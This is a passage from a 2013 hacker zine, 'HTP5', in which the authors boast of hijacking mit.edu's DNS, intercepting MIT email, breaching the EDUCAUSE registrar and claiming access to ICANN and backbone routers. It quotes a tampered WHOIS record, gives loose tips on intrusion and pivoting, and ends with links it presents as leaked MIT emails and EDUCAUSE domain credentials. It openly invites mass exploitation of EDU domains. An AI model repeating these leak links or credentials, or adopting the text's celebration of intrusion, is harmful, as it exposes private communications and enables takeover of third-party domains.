▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄ ██████▄▄█▓▓██████████████████▓▓▓██▓▄▄███ > Intro █ █ █████████▓▓██████████████████▓▓▓██▓███▓█ > MIT/EDU ▀▀▀█ █▀▀ ███▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀█▓█ > Linode █ █ █▓█ ███▀▀▀▀▀███▀██▀▀█▀▀██▀██▀▀▀▀▀███ █▓█ > Nmap █ █▄▄▄▄▄▄▄▄▄ ███ ██ ▄▀ ▀▄ ██ █▓▓ ███ █ ▄▀ ▀▄ ▓▓ █▓█ > Sucuri ▀▀▀▀█ █ █▓█ ▓▓ ▀▄ ▄▀ ██ █▓▓ ███ █ ▀▄ ▄▀ ██ █▓█ > NIST NVD █ █▀█ █ █▓█ ███▄▄▄▄▄███▄██▄▄█▄▄██▄██▄▄▄▄▄███ ███ > Wireshark █ █▄█ █ █▓█ ________________________________ █▓█ > Art █ █▄▄▄▄▄▄ █▓█ HTP____________________MWTB_DLTR ███ > Zerodays ▀▀▀▀▀▀▀█ █ ██████▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀██████ > Outro █ █▀▀▀▀ █▓▓██ █▀▀████████████████████▀▀█ ██▓▓█ > See reverse for █ █▄▄▄▄ ████ ████████████████████▓▓██████ ████ > HTP4 █ █ ▀▀▀▀▀▀▀▀ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ █████████████▒████████ ▓▒██████▒░█░███░░ ▒███████████▒ ███████████ ▓█████████████████████▒ ▓████ ▒█████████▒▒░███████████████████████▒ ░▒███████░████████▒██ ▒██████████████████████░ ▓███████████████▒██ ░█ ░████████████████████████░ ████████████████████▒ ███▒█████████████████████████████ ░████████▒██████████████████ ▒█████████████████████████▒ ███████████▒████████████ ▒ ███████████████████████████▒ ▒██████████▒ ░████████████ ▒██▓ ░▒██████████████████████████▒ █████████ ▒███▒ ███████░ ███████████████████████████████████ █████████░██████ █████▒██▓ ▓███████▒▒████████████████████████████ ▒██████████████████ ████▒▓▒█▒ █████████████████████████████████████ ░████████████████████░▓█░ ░█ ░▓███████████████████████████████████ ███████████████████▓ ░ █ ░██████████████████████████████████ ████████████████████ █▒ ██░▒███████████████████████████████████ ▒███████████████████ ▒ ▒▓███▒▓ ███████████████████████████████████ ░██████████████████ █▓▓▓▓█░ █ ████████████░ ░████████████████ ██████████████████ ▓███ █░ █████████████▓██████████████████ █ ██████████████████ ░░ ▓█ ▒ ███████████████████████████████ ▓ ██████████████████░ ▓ █░ █ ███████████████████████████████░ ██████████████████ ██ ▒███ ████████████████████████████████▒█ ███████████████▒██ █ ░▒▒██ ░▒████████████████████████████ █ ███████████████▒▒▒ ███ ████████████████████████████▒ █░ █░ ▓▓██████ ░ ▓█ ████▒ █ ████████████████████████████ █▓ ██████▒ ▒█ ▒ █▓ █ ▓████████████████████████████ ▒█▒ ▓ ▒▒█▓█▓████ ▒▒██▒ ██ ▒▒▒░█████████████████████████████▓██ ███▓ █░ ▒██████░ ░ ░▓███▒ ██████████████████████████████░ ██ █▓ ░████▒▒ ██ ▒ ░▒▒▓█▒ █████████████████████████████ ░ ▓█▓ ██████▓▒ ███ ██ ██▓█▒▓░ ░██████████████████ ▒░ ░███ ████████████▒▒ ▓▓ ▓█░ █ ██████████████████ █▒ ▒██▒ ██████████████ ░ █▒ ▒▒█▒▓ ▒▒▒░██████████████████ ██ ██ ▒▓ ███████████████████ ██▒ ▒███▒▓██▓ █ ░████████████ ██▓█ █ ███████████████████▒ ███▓ ▓█ █▓ ████████████▓ ███ ██████████████████████░▒▒█▒ ▒█ █▒ ██ ██████████▓ █▒█ ████████████████████████ ░░ █▒ ▒ ▓██████████ ▒▒█ ███████████████████████ █ █ ▒ ▒▒█████████▓ █▒ ▒███████████████████████▒ █ ██ ██▒ ██ ░███▒ ██ ██ █ ▒░ ▓███████████████████ ██ ███▒ ▒ ░██ █▒▒ ▒████░░██ ██ █▓███▒ ██▓▒█████████████░ ██ ▓█░░░░██░ █▒ ▒ ░█░ ▓█░░██░ ████▒ █ ▓███████████ ▓███░ █ ▓█ ▒ ▒▓ ███ █████ ███ ████████░ ▒█░ ██ █ ██ ▒▓ ▒ ███ ██ █▓██▓ ██▒ ▒███████▓ █▒ ▓▓ ░███ ██▒▒▒ ▒█░ ███████▒ ▒█░▒ ░ ░█░ ███████▒ ░▓ ▒█████▒███▓░ ▒███▒████░ ███████▒ ▒█████░░ ░▒ ░███████ ░█▓ ░░███ █ █ █ ██████▓ ▒██████ ▒███████████ ░ ▒▒███ ░▓ █ ░ ░█ █████▒ ▒███████▒ ███ ▒██████░███▒▒▒█░ ▒ ▓ █░ █ ░████▓ ███████ ░█░ ░▒ ▓██████ █ ▒█ █░ ▓██░░█▒▒ ▒████▒ ▓███████ ▒█▒ ░██ ▒██ ▒ ███████ ███░████▓██████ /████████ /████████ /██████████████████ /███████████████▄ |▒████████ |████████ |▒██████████████████ |▒█████████████████ |▒████████ |████████ |▒██████████████████ |▒██████▀▀▀▀▀▀█████ |▒█▓▓▓▓▓▓█▄▄▄▄▄█▓▓▓▓▓▓█ |/▒▒▒▒/█▓▓▓▓▓▓█▒▒▒▒/ |▒█▓▓▓▓▓ |▓▓▓██ |▒█▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█ |▒█▓▓▓▓▓▓█ |▒█▓▓▓▓▓ |▓▓▓██ |▒█▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█ |▒█▒▒▒▒▒▒█ |▒█▓▓▓▓▓▓▓▓▓▓▓▓▓▓██ |▒█▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒█ |▒█▒▒▒▒▒▒█ |▒█▒▒▒▒▒▒▒▒▒▒▒▒▒▒██ |▒█▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒█ |▒█░░░░░░█ |▒█▒▒▒▒▒█▀▀▀▀▀▀▀▀▀ |▒█░░░░░░█▀▀▀▀▒█░░░░░░█ |▒█░░░░░░█ |▒█░░░░░█ |▒█░░░░░░█ |▒█░░░░░░█ |▒█ █ |▒█░░░░░█ |▒█ █ |▒█ █ |▒█▄▄▄▄▄▄█ |▒█ █ |▒█▄▄▄▄▄▄█ |▒█▄▄▄▄▄▄█ |/▒▒▒▒▒▒▒/ |▒█▄▄▄▄▄█ |/▒▒▒▒▒▒▒/ |/▒▒▒▒▒▒▒/ |/▒▒▒▒▒▒/ ░ ░░▒ ZINE 5 htphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtpht ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ NORTH KOREA OF THE INTERNET SINCE 2011 ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ So its been 182 days since our last zine, since then our dedicated team of researchers, philanthropists, playboys and troublemakers have been busy at work scouring the Internet for high quality entertainment at the expense of everybody who isn't us. 5/1 also marks the day HTP was founded, which means we've had two glorious years of being the best and owning the rest. Today we will be drinking 40s, listening to some balla tunes, and circlejerking over the inevitable confusion, awe, bitterness and jokes that will ensue from this release. :) Due to the immense size of HTP5, this zine is unfortunately not self extracting. However do not fret, this zine is full HD and 4D ready. We've divided everything into its own section just to keep things sane. So go get the popcorn ready and strap in for a long and wild ride. This zine is a tale of trust, betrayal, brotherhood, rampant paranoia, hilariously shoddy police work (More on that later), and the plight of the whitehat sheep being fleeced at will by their blackhat shepherds. It's really only missing a tacked on love story, a few good car chases, and an explosion at the end, but it might not be too late for all of that. ▀ ▄ █▄▄ ▄____ ░ █▄ ▄ ▄███▀▀ \;',`'-,▓█░ ▓██▀-;_,; ':-;_,'.█▓░ ▓▓██; '/ , _`.-\█▓ ░▓███▄'`. (` /` ` \`|█ ░ ▓▓▓ █|██ `\`-. \_ / |▓ ░█▓▓█▓░░ | █▓ ( `, .`\ ;'|░ ░▓▓█░ ░░ \ ░ ▓░░ .' `-'/▀ ▄▄▓▓▄▄▄▄▄▄▄▄▄▄▄▄▓▄▄▓▓▓░ .'▀ ░██▓▀ ▀█████████████████▄.-'` ███░ ███▀▀███▀▀███ ███ █████████ ███ ███▄▄███ 2013 ▒ ░ █████████ ███ ██████▀ ███ ███ ███ ███ ▄███▄ ▄███▄ ███ ▄███▄ ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ ▄ ░████▓██▓██▓▒▒▒░ ░▒██████▓▓███████▒████▒░░░░ ░▓████████████████▒██▓████▒▒░░ ░░ ░░░░ ░▒▓████████████████████████▓▓██▒█▓▒▓▒▒▓█░░ ░░ ▒████████████████████████████████▓▓▓██████▓ ▒ ░░ █▓▓███████████████████████████████████████▓▓▓ ░ ░ ░▒ ░▓▓█▓███████████████████████████████████████████░ ▒ ░ ▒░ ▒▓▓▓▓▓▓▓█████████████████████████████████████████▓▓░░▒ ░ ░▒▓▓▒▓▓██████████████████████████████████████████████▓▒ ░░ ░ ░ ░▒▒▒▓▓▓▓▓▓▓▓▓▓▓███████████████████████████████████████▓▓█▒ ░ ░░ ░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓████████████████████████████████████████▓▓▓▒ ▒░ ░▒█▓█▓█▓▓▓▓▓▓█▓▓▓▓▓▓█████████████████████████████████████████▒█ ▒░ ░▓▓▓▓▓▓▓▒█▓▒▓▓▓▓▓▓▓▓▓▓████████████████████████████████████████░█▓ ░ ▒ ░██▓▓▓▓█▓▓▓▓█▒▓▓▓▓▓▓▓▓▓▓▓██████▓████████████████████████████████▓██▓█░░ ▒▓█▓▓▓▓▓█▓█▓▒░▒░█▓▓▓▓▓▓▓▓▓▓██████████████████████████████████████▓███▓▒▒ ▒█▓▓▓▓▒▓█░░▓▓▓░██▒▓▓▓▓▓▓▓▓▓▓▓████▓██████████████████████████████████▓██▓▓ ▓▓▓██▓▒▓▓▓█▒░▓▒▓▓▒▓▓▓▓▓▓▓▓▓▓▓▓████████████████████████████████████████████ █▓█▓▓▒▓▒▓▓▓▒░▒▓▓▓▓░░▓▒▓▓▓▓▓▓▓▓█████████████████████████████████████████▓▓▓ ░▓▓▓▓▒▓▒▓█▓▓▒░░▓▓▓▓▓▒▒▓▓▒▓▓▓▓▓███▓▓████████████████████████████████████████ ░▒░█░▒▒░▒▓▓▓▒▒░░░▓█▓▓▓▒▓▓▒▒▒▓▓▓██▓▓████████████████████████████████████████ ░░ ░ ░ ░▒▓▒▒▒▒░▒░▓▓▓▓▓▓▓▒▓▓▒▒▓█████████████████████████████████████████████ ▒▓░ ░░░░▒▓▓░▒░▒▓░░░▒▓▓▓▓▓▓▓▓▓▓██████████████████████████████████████████████ ██▒▒░░▒░▒▓▓░▒▒▒▒▒░░▒▒▓▓▓▓▓▓▒▓█▓█████████████████████████████████████████████ ██▓▒▒▒▒░▒▒▓░██▒▓▓▒▒▒░▓▓▓▒▒▓▓████████████████████████████████████████████████ ████▓▓▓▓░▓▓░▓▓█▓▓▒▒▒░░▒█▒▒▓█████████████████████████████████████████████████ █▓█▓▒▓██░█▓░▒▓█▓▓▓▒▒▒▒▒██▓██████████████████████████████████████████████████ ▓█▒░░▓▒▒▓▓▒░░░▒▒▒▓▓▓█▓██████████████████████████████████████████████████████ ▒█▒░ ▓ ░▒▒░ ░ ░░░░▒░░▒▓█▓█████████████████████████████████████████████████ ░█▒░ ░ ░░░░▒█▓███████████████████████████▓▒░▒▒▒▓█████████████ ░░ ░░░░░░▒█████████████████████████▓▒▓▓▓▓▓▓▓▒▓███████████ ░ ░░░░░░░░░▓███████████████████████▒▓██▓▒░░▒▒▒▒██████████ ░ ░░░░░░░░░░░▓▓████████████████████████▓▒░░░░▒░░▓█████████ ░ ░░░░▒▓▓▒░░░░░░░░░░░░▒░█████████████████████▓▓▓░ ░░░▒░▒█████████ ░░░░ ░▒▓▒ ░▒▒▓▓▒░░░░░░░░▓▒███████████████████████▓██▒▒░░▒░▓████████ ░░ ░██▓▓▓▒░░ ░░░░░░░░░░░░░░░▒▓▓██████████████████████▓▓▒▒░░▒░██████▓▓▓ ░ ░▒▒▓▓▓░▒░░░▒▒░░░░░░ ░ ░░░░▒█████████████████████▓▓▓▒░░░▒▒██▓██▓▓▓▓ ░ ░▒▒▒░ ░░▒▒░░ ░░░░░▓███████████████████▓██▓█▒░▒░███▓█▓▓▓▓▓ ░░░░░ ░▒▒░░ ░░░░░░▒████████████████████▓▓▒▒▒░▓▓████▓▓▓██ ░░░ ░▒▒░░ ░░░░░░▒▒▓█████████████████▓▓▓▓▒░▓███████▓▓▓█ ░░ ░░░░░▒▒▒▒▒██████████████▓▓▓▓▒▒▒▓██████▓▓▓▓▓▓ ░░ ░░░░░░▒▒▒▒▒▓█████████████▓▓▓▓▒▒▓██▓██████▓██▓ ░░ ░░░░░░▒▒▒▒▒▒▒██████▓██▓██▓▓▓▓▓▓▓▓▓▓▓▓███▓█▓▓▓▓ ░░░ ░░░░░░▒▒▒▒▒▒▒▒▒█████▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓███▓▓█▓▓▓▓ ░░ ░░░░░░░▒▒░▒▒▒▒▒▒▓████▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓███▓▓▓ ░ ░░░░░ ░░░░░░▒░▒▒▒▒░▒▒▒▒▒▓███▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓▓▓▓▓ ░░ ░▒░░░░░ ░░░░░░░░░░░░░░▒▒▒▒▒▒▒▓█▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██▓▓▓▓█▓ ░░░░░ ░░▒▒░ ░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▓▓▓█▓▓▓▓▓▓▓▓▓▓▓▓▓███▓▓▓█▓▓ ░▓▒▒▒▒▒▓░ ░░░░░░░░░░░░░░▒░▒░▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██▓▓▓▒░░ ▒░░░ ░░░░░░░░░░░░░░░░░░▒░░▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▒▒░░ ░ ░░░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓█▓▓▓▒▒░░ ░ ░░░░░░░░░░░░░░░░░▒░░░▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓▓▓▓▓░░ ░░░░░░░░░░░░ ░░░░░░░░░░░░░░░░░░░▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓█▓▓▓▒ ░▒▒▒▒▒▒▒▓▓▒░ ░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▒░ ░▒▒ ░░░ ░░░░░░░░░░░░░░░▒░▒▒▒▒▒▒▒▓▓▓▓▓▓▒▒▒▓▓▓▓▓▓▓▓▓▓▒░░ ░ ░░░░░ ░░░░░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓░░ ░▒▒▓▓▒░░ ░░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▒▒▒░░░▒▒▓▓▓▓▓▓█▓▓▓▓▒ ░░░▒▒░░░ ░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▒▒░░░░░░▒▒▓▓▓▓▓▓▓▓█▒▒░ ░ ░░░▒▒▒░▒▒▒▒▒▒▒▒▒▒▒▒▓▓▒▒░░░░░░░░░▒▒▓▓▓▓▓▓▓▓▓▒░ ░ ░░▒▒▒▒▒▒▒▒▒▒░▒▒▒▒▒▒▓▓▓▒░░░░░░░░░░▒▒▓▓▓▓▓▓▓▓▓▓░ ░ ░░▒▒▒▒▒▒▒▒▒▒░░░░▒▓▓▓▓▒▒░░░░░░░░░░▒▒▒▓▓▓▓▓▓▓▓▓▓▓░ ░ ░░░▒▒▒▒▒▒▒▒▒░ ░▒▓▓▓▓▒▒░░░░░░░░░░░░▒▒▒▒▓▓▓▓▓▓▓▓▓▓▒▒ ░░ ░▒▒▒▒▒▒▒▒░░ ░▒▓▒▒░░░░░░░░░░░░░░▒▒▒▒▒▒▓▓▓▓▓▓█▓▒▓ ░░░▒▒▒▒▒░░░ ░▒▒░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▓▓▓▓▓▒███ ░ ░░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▓▓▒█▓███ ░ ░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▒▒███████ ░ ░░░░░░░░░░░░░░░░▒▒▒▒░▒▓▒▒▒▓▓▒ ░ ░░░░░░░░░░░░░░▒░▒█▓▒▓▓▒▒▒▒ ░ ░░░░░░░░░░▒░░▓▒▓▓▓▓▓▒▒▒▒ ░ ░░░░░░░▒▒▓█▓██▓▓▓▓▒▓ ░ ░▒▒▓▓▓▓▓█▓▓▓▓▓▓▓ ▒ ░▒▓▓▓▓▓█▓▓▓▓▓▓▓▒▒ ▒▒██ ░░▒▒██▓▒▒▒▒▒▒▒▒▓▓▒▒▒ ░▒█▓██▒ ░░▒▓▓▓▓▒▒▓▓▒▓▒▒▒░░░░░ ▓███▓██ ░░░▓▒▒▒▒▓▒░▒▓▓▓▓▓▓▓████ ░░█████▓▒ ▒▓▓▓░░░░▒▒▓██▒░░░░▓▒▒▒░░░░▓▓▓ ░▒▓▒██▒▓░ ░░░░▒░░░░░▒▓▓▓█▒▒░░░▒▓▒▒▒▒░░░░▒▒▒ ░█████▒█░░░░░░░░░▒ ░▓██▓▒▒░░░▒▓█▓▓▒▒░░░░░░░░ ░ ███▒███▓░░░░░░░░▒░░▓█▓▓░░░░░▒▓▓▓▓▒░░░░░░░▒▓▓ ▓█▒█████░░░░░░░░▓░ ███▒░░░░░░░▓▓▒▒░░░░▒▒░▒▒░░ ░▒█████▒░░░░░░░▒▒▓▒█▓▒▒░░ ░▒▒▒▒▒▒▒▒▒░░░▒▒▒▓▓▒▒ ▒▓██████░░░░░░░▓▒░▓█░░▒▓▒░░░░▒▒▓▓▒░▒░░░░▒▓▒▒▓█▓ ███████░░░░░░░░▒▓░▒░▒▓▒░▒░░░▒▒▒▒▓▒▒░ ░░░░░▒▓▓░░ ███████░░░░░ ░░░▒▒█░░░░░▒░░▒▒▒▒░▒▓▒░░░░░░░░ ▓░▒▒ ▒▒█████░░░░░ ░░░░▒█▓▒ ░▒▒▒▒░▒▒▓░░░▓▓▒░░░░░▒░▒░░░░ ▒▒█▒█▒▓░░░░░░░░░░▒██▒██░░░██▒░▒░▒▒▒▒▒░░░░▒▒▓▒▒█▒██ ░█▒████░░░░░░░░░░░▓█▒████░░▒▒█▒░░▒▒▒▒▒▒▒▒░░▒░░░▒█▒░ ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ "What's the score?" ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ██ ██ ██ ██ █████ HTP5 ██ ██ ██ ▄▄ ▄▄ ██ ▀▀ ██ ██ ██ FEATURING EDUCAUSE ▄██▄▄▄▄██▄▄██▄▄██▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ Back in January we decided to upstage Anonymous (again) and have a little fun with MIT. After their circa 2000 deface on mit.edu, we decided to up the ante. In doing so, we knew we had to make it very clear that it was an anti-Anonymous deface (A mirror of it can be found here: straylig.ht/files/mit/mit.html). Thus why it made reference to Sabu, grand wizard of LulzSec, and "DOWN WITH ANONYMOUS." Despite all this, some of the cluebags in the media apparently thought that by "DOWN WITH ANONYMOUS," we meant "we b down wit da lol anonimuss leejun y0!" Additionally, almost everybody missed the fact that it was a troll deface, which just proves that it will be a few decades before we reach October 1st, 1993. MIT's reaction was particularly lulzy. They did a better job of reporting the facts than all the media outlets, but they couldn't decide whether the e-mail got intercepted or not. First, there was this from http://tech.mit.edu/V132/N62/hack.html: "Unlike previous attacks, which temporarily disabled some services, this attack had the potential to be much more severe. A more calculated hacker could have intercepted email messages intended for anyone at the MIT.edu domain, including all alumni who use alum.mit.edu email addresses." After having a day to do a better post-mortem, MIT started freaking out. They published this: http://tech.mit.edu/V132/N63/hack.html. From that link: "Unlike previous attacks, which temporarily disabled some services, this attack had the potential to be much more severe. Email was specifically affected. Mail is normally received by one of nine different MIT servers; however today, mail that was sent between 11:58 a.m. and 1:05 p.m. was directed to a machine at KAIST, Korea Advanced Institute of Science and Technology, meaning the attackers had complete control of emails successfully sent during that time." We don't know the percentage either, but we know 5.1 GB of uncompressed e-mail when we see it :P. So who owned the domain? Well : ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ Domain Name: MIT.EDU Registrant: Massachusetts Institute of Technology Cambridge, MA 02139 UNITED STATES Administrative Contact: I got owned Massachusetts Institute of Technology MIT Room W92-167, 77 Massachusetts Avenue Cambridge, MA 02139-4307 UNITED STATES (617) 324-1337 cunt@mit.edu Technical Contact: OWNED NETWORK OPERATIONS ROOT US DESTROYED, MA 02139-4307 UNITED STATES (617) 253-1337 owned@mit.edu Name Servers: FRED.NS.CLOUDFLARE.COM KATE.NS.CLOUDFLARE.COM Domain record activated: 23-May-1985 Domain record last updated: 22-Jan-2013 Domain expires: 31-Jul-2013 ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ Here's the cherry on top: ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ From: "CloudFlare Support" Subject: [CloudFlare Support] Pending request: Why is cloudflare staff modifying my dns records? (ticket #12053) Date: Wed, January 23, 2013 4:48 pm To: "Fuckmit" ##- Please type your reply above this line -## [CloudFlare Support] Pending request: Why is cloudflare staff modifying my dns records? (ticket #12053) This is an email to remind you that your request (#12053) is pending and awaits your feedback. Please click the link below to review and update your request: http://support.cloudflare.com/tickets/12053 ---------------------------------------------- Justin, Jan 22 11:48 am (PST) Hi, We have reason to believe you are not the actual owner of the mit.edu domain. We have been in contact with the actual owner this morning. As such we have taken steps to secure the account, and the domain has already been returned to the actual owner. ---------------------------------------------- Fuckmit, Jan 22 11:45 am (PST) Two questions: Why is cloudflare staff modifying my dns records without authorization? Why is cloudflare staff repeatedly regenerating my API key every time they decide to modify my dns records without authorization? -------------------------------- This email is a service from CloudFlare Support ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ You have reason to believe a user named 'Fuckmit' is not the legitimate owner of mit.edu? Excellent deduction, Justin. Soon after, we decided to troll Gizmodo and the rest of the media into preserving our access. The 'browser exploit' on MIT's NOC ( http://gizmodo.com/5978039/hackers-incoherently-deface-entire-mit-website ) never existed. We'd never show our full hand at once, we'd just lose access. MIT certainly believed us though, despite their own reassurances otherwise. For confirmation, they contacted the root registrar for EDU domains (EDUCAUSE) after finally asserting that we got access to their EDUCAUSE account. EDUCAUSE then made the fatal mistake of overlooking our complete access into the EDU TLD. Though, we can't say we expect much from a registrar running ASPX on their backend. Now, just in case you don't believe us, we have entrusted the login credentials of nearly every EDU domain to hackers worldwide (active as we speak) within the MIT section of this zine. So, let's see what happens first, mass exploitation or whitehat response? ;) We are not ones for defacing, actually, and we're going to leave that up to the Internet Justice League (AKA Anonymous) if they can even get to it on time. And we figure they'll manifest some statement about how its morally justifiable to deface *.edu. We frankly don't care. By the end of today (5/6), EDU operation should return to normal. Moreover, we particularly enjoyed the fact that the first nameserver for root-servers.org is an EDU domain. This effectively gave us control over root-servers.org. However, ICANN is responsible for the root zones file. ICANN was already compromised by that time, though, joined by several of the major RIR's (RIPE, LACNIC, etc.) along with bgp+shell access and 13,000+ backbone AS's (some of which persists to this day) & the InterNIC. Surprisingly, they used passwordless private keys stored on their servers to ssh into the internal Juniper routers as superusers: only 3 networks away and not even phys sep. Nothing proxychains can't handle. They probably should've checked their netscreens before it was too late. :P None of this access was ever used, but we did get to see some pretty funny shit. In the backbone of SourceForge (Savvis), for example, we ran into some old SunOS Sparc boxes with 1900+ day uptime. They had passwordless private key auth, and the kernels were fairly ancient (and in the absence of all file transfer utils, `whois` coupled with a few pipes worked great to transfer tgz's served from port 43 - no file editing required). As it turns out, we were not the first ones there. On their Phoenix, AZ stats server, some random hacker was kicking back in /var/tmp/.access_logx/ with a psyBNC connected to Undernet. On SourceForge's backbone -- LOL? We don't think he fully realized what he had breached. Or maybe he just really needed a psyBNC server. Either way, he'll probably have to end up getting a new psyBNC after today. On Github or something. Enjoy the MIT emails/EDUCAUSE login data, included in this segment of HTP5: ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ~ http://mirror.hack-the-planet.tv/HTP-5/MIT-EDUCAUSE/mit.zip |- 2.6GB | Zip compressed MIT emails ~ http://mirror.hack-the-planet.tv/HTP-5/MIT-EDUCAUSE/EDUDOMAINS.rpt |- 28MB | EDUCAUSE database: extracted domain credentials ~ http://mirror.hack-the-planet.tv/HTP-5/MIT-EDUCAUSE/EDUCAUSE-MISCDBS.zip |- 12MB | EDUCAUSE misc. databases extracted from 6.4GB MSSQL tape backup ~ http://mirror.hack-the-planet.tv/HTP-5/MIT-EDUCAUSE/eduhashindex.txt |- 143K | EDUCAUSE domain passwords, allow account/DNS modification. | | For use with /HTP-5/MIT-EDUCAUSE/EDUDOMAINS.rpt ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄ ▀▄▄▒▒▒▒▒▒▒▒▒▒▒▒▒░ ░▒▒▒▒▒▒▒▒▒░░ ▒▒▒▒▒▒▒▒▒▒▒▒░ ▒▒▒▒▒▒▒▒▒▒░ ░░░░░ ░░ ░ ░░ ▒▒█▄▄ ▀▀▄▄ ░ ▒▒▒▒▒▒░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▒▒▒▒▒▒▒ 